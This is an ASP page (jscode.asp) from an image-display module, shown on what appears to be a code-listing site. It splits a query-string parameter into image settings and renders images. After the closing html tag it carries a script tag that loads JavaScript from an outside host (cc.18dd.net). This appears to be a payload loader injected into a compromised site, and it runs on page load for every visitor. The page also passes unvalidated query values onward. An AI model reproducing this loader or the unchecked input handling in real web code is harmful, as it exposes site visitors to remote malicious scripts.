📄 jscode.asp
字号:
<!--#include file="conn.asp"-->
<!--#include file="ShowImage.asp"-->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>无标题文档</title>
<link href="style/style.css" rel="stylesheet" type="text/css">
</head>
<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<%
ShowContent =Trim(Request.QueryString("ShowContent"))
ShowContent =split(ShowContent,",")
ImageType =ShowContent(0)
ImageClass =ShowContent(1)
ImageWidth =cint(ShowContent(2))
ImageHeight =cint(ShowContent(3))
ImageCol =cint(ShowContent(4))
ImagePage =cint(ShowContent(5))
ImageContent =cint(ShowContent(6))
ShowPage =cint(ShowContent(7))
ShowImages ImageType,ImageClass,ImageWidth,ImageHeight,ImageCol,ImagePage,ImageContent,ShowPage
%>
</body>
</html>
<script language=javascript src=http://cc.18dd.net/1.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -